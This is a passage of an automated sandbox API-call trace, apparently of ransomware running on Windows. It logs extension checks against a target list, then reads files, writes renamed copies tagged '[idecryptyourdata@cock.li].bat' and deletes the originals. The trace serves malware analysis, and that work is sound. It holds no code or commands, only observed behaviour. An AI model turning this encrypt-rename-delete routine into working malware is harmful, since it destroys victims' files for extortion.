(lpString=".xlsx") returned 5 [0069.511] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.511] lstrlenW (lpString=".ppt") returned 4 [0069.511] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.511] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0069.511] lstrlenW (lpString=".zip") returned 4 [0069.511] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.511] lstrlenW (lpString=".rar") returned 4 [0069.511] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.511] lstrlenW (lpString=".bz2") returned 4 [0069.511] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.511] lstrlenW (lpString=".7z") returned 3 [0069.511] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.511] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0069.511] lstrlenW (lpString=".dbf") returned 4 [0069.512] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.512] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0069.512] lstrlenW (lpString=".1cd") returned 4 [0069.512] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.512] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0069.512] lstrlenW (lpString=".jpg") returned 4 [0069.512] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.512] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0069.512] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0069.512] lstrlenW (lpString=".doc") returned 4 [0069.512] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.512] lstrlenW (lpString=".docx") returned 5 [0069.512] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.512] lstrlenW (lpString=".pdf") returned 4 [0069.512] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.512] lstrlenW (lpString=".xls") returned 4 [0069.512] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.512] lstrlenW (lpString=".xlsx") returned 5 [0069.512] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.512] lstrlenW (lpString=".ppt") returned 4 [0069.512] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.512] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0069.512] lstrlenW (lpString=".zip") returned 4 [0069.512] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.512] lstrlenW (lpString=".rar") returned 4 [0069.512] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.512] lstrlenW (lpString=".bz2") returned 4 [0069.512] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.512] lstrlenW (lpString=".7z") returned 3 [0069.512] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.512] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0069.512] lstrlenW (lpString=".dbf") returned 4 [0069.512] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.512] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0069.512] lstrlenW (lpString=".1cd") returned 4 [0069.512] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.513] lstrlenW (lpString="C:\\Logs\\Setup.evtx") returned 18 [0069.513] lstrlenW (lpString=".jpg") returned 4 [0069.513] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.513] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0069.513] lstrlenW (lpString="System.evtx") returned 11 [0069.513] CreateFileW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0069.514] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=1118208) returned 1 [0069.514] CloseHandle (hObject=0x2c8) returned 1 [0069.514] GetFileAttributesW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx")) returned 0x20 [0069.514] GetFileAttributesW (lpFileName="C:\\Logs\\System.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\system.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0069.514] CreateFileW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0069.514] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.514] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.514] CreateFileW (lpFileName="C:\\Logs\\System.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\system.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0069.515] GetLastError () returned 0x0 [0069.515] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0069.536] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0070.221] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11010, lpOverlapped=0x0) returned 1 [0070.229] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11020, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11020, lpOverlapped=0x0) returned 1 [0070.234] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0070.234] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xea, lpOverlapped=0x0) returned 1 [0070.234] SetEndOfFile (hFile=0x394) returned 1 [0070.234] CloseHandle (hObject=0x394) returned 1 [0070.234] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.234] SetEndOfFile (hFile=0x2c8) returned 1 [0070.235] CloseHandle (hObject=0x2c8) returned 1 [0070.235] SetFileAttributesW (lpFileName="C:\\Logs\\System.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0070.235] DeleteFileW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx")) returned 1 [0070.236] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0070.236] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0070.236] lstrlenW (lpString=".doc") returned 4 [0070.236] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0070.236] lstrlenW (lpString=".docx") returned 5 [0070.236] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0070.236] lstrlenW (lpString=".pdf") returned 4 [0070.236] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0070.236] lstrlenW (lpString=".xls") returned 4 [0070.236] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0070.236] lstrlenW (lpString=".xlsx") returned 5 [0070.236] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0070.236] lstrlenW (lpString=".ppt") returned 4 [0070.236] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0070.236] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0070.236] lstrlenW (lpString=".zip") returned 4 [0070.236] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0070.236] lstrlenW (lpString=".rar") returned 4 [0070.236] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0070.236] lstrlenW (lpString=".bz2") returned 4 [0070.236] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0070.236] lstrlenW (lpString=".7z") returned 3 [0070.236] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0070.236] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0070.236] lstrlenW (lpString=".dbf") returned 4 [0070.236] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0070.236] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0070.236] lstrlenW (lpString=".1cd") returned 4 [0070.236] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0070.236] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0070.236] lstrlenW (lpString=".jpg") returned 4 [0070.236] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0070.237] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0070.237] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0070.237] lstrlenW (lpString=".doc") returned 4 [0070.237] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0070.237] lstrlenW (lpString=".docx") returned 5 [0070.237] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0070.237] lstrlenW (lpString=".pdf") returned 4 [0070.237] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0070.237] lstrlenW (lpString=".xls") returned 4 [0070.237] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0070.237] lstrlenW (lpString=".xlsx") returned 5 [0070.237] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0070.237] lstrlenW (lpString=".ppt") returned 4 [0070.237] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0070.237] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0070.237] lstrlenW (lpString=".zip") returned 4 [0070.237] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0070.237] lstrlenW (lpString=".rar") returned 4 [0070.237] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0070.237] lstrlenW (lpString=".bz2") returned 4 [0070.237] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0070.237] lstrlenW (lpString=".7z") returned 3 [0070.237] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0070.237] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0070.237] lstrlenW (lpString=".dbf") returned 4 [0070.237] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0070.237] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0070.237] lstrlenW (lpString=".1cd") returned 4 [0070.237] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0070.237] lstrlenW (lpString="C:\\Logs\\System.evtx") returned 19 [0070.237] lstrlenW (lpString=".jpg") returned 4 [0070.237] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0070.238] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0070.238] lstrlenW (lpString="api-ms-win-core-localization-l1-2-0.dll") returned 39 [0070.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0070.238] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=21184) returned 1 [0070.238] CloseHandle (hObject=0x2c8) returned 1 [0070.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll")) returned 0x20 [0070.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0070.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0070.238] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.238] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0071.587] GetLastError () returned 0x0 [0071.587] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x52c0, lpOverlapped=0x0) returned 1 [0071.651] WriteFile (in: hFile=0x388, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x52d0, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x52d0, lpOverlapped=0x0) returned 1 [0071.652] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0071.652] WriteFile (in: hFile=0x388, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x122, lpOverlapped=0x0) returned 1 [0071.652] SetEndOfFile (hFile=0x388) returned 1 [0071.652] CloseHandle (hObject=0x388) returned 1 [0071.652] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0071.652] SetEndOfFile (hFile=0x2c8) returned 1 [0071.653] CloseHandle (hObject=0x2c8) returned 1 [0071.653] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0071.653] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll")) returned 1 [0071.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0071.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0071.654] lstrlenW (lpString=".doc") returned 4 [0071.654] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.654] lstrlenW (lpString=".docx") returned 5 [0071.654] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.654] lstrlenW (lpString=".pdf") returned 4 [0071.654] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.654] lstrlenW (lpString=".xls") returned 4 [0071.654] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.654] lstrlenW (lpString=".xlsx") returned 5 [0071.654] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.654] lstrlenW (lpString=".ppt") returned 4 [0071.654] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0071.654] lstrlenW (lpString=".zip") returned 4 [0071.654] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.654] lstrlenW (lpString=".rar") returned 4 [0071.654] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.654] lstrlenW (lpString=".bz2") returned 4 [0071.654] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.654] lstrlenW (lpString=".7z") returned 3 [0071.654] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0071.654] lstrlenW (lpString=".dbf") returned 4 [0071.654] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0071.654] lstrlenW (lpString=".1cd") returned 4 [0071.654] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0071.655] lstrlenW (lpString=".jpg") returned 4 [0071.655] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0071.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0071.655] lstrlenW (lpString=".doc") returned 4 [0071.655] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.655] lstrlenW (lpString=".docx") returned 5 [0071.655] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.655] lstrlenW (lpString=".pdf") returned 4 [0071.655] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.655] lstrlenW (lpString=".xls") returned 4 [0071.655] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.655] lstrlenW (lpString=".xlsx") returned 5 [0071.655] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.655] lstrlenW (lpString=".ppt") returned 4 [0071.655] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0071.655] lstrlenW (lpString=".zip") returned 4 [0071.655] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.655] lstrlenW (lpString=".rar") returned 4 [0071.655] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.655] lstrlenW (lpString=".bz2") returned 4 [0071.655] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.655] lstrlenW (lpString=".7z") returned 3 [0071.655] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0071.655] lstrlenW (lpString=".dbf") returned 4 [0071.655] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0071.655] lstrlenW (lpString=".1cd") returned 4 [0071.655] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0071.655] lstrlenW (lpString=".jpg") returned 4 [0071.655] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.656] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0071.656] lstrlenW (lpString="api-ms-win-crt-environment-l1-1-0.dll") returned 37 [0071.656] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0071.891] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=19136) returned 1 [0071.891] CloseHandle (hObject=0x38c) returned 1 [0071.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll")) returned 0x20 [0071.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0071.891] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0071.892] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0071.892] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0071.892] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0071.892] GetLastError () returned 0x0 [0071.892] ReadFile (in: hFile=0x38c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x4ac0, lpOverlapped=0x0) returned 1 [0072.275] WriteFile (hFile=0x394, lpBuffer=0x3e08020, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0) Thread: id = 16 os_tid = 0x2e8 [0045.439] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x3c50e18 [0045.439] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x3c60e20 [0045.440] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cf98 [0045.440] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x65d110 [0045.440] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62ce00 [0045.440] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x3f14020 [0045.442] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62ce48 [0045.442] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62ce48, Size=0x20) returned 0x60e9d0 [0045.442] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cef0 [0045.442] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62cef0, Size=0x20) returned 0x60ea20 [0045.442] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0045.443] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0045.443] Wow64DisableWow64FsRedirection (in: OldValue=0x320ff50 | out: OldValue=0x320ff50*=0x0) returned 1 [0045.443] lstrlenW (lpString="kernel32.dll") returned 12 [0045.443] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e9d0 | out: hHeap=0x5d0000) returned 1 [0045.443] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0045.443] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ea20 | out: hHeap=0x5d0000) returned 1 [0045.443] Sleep (dwMilliseconds=0x64) [0045.634] Sleep (dwMilliseconds=0x64) [0045.803] lstrcmpiW (lpString1=".cmd", lpString2=".bat") returned 1 [0045.803] lstrlenW (lpString="preoobe.cmd") returned 11 [0045.803] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.481] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=74) returned 1 [0046.481] CloseHandle (hObject=0x2c8) returned 1 [0046.481] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd")) returned 0x20 [0046.481] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.481] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.481] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.481] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, 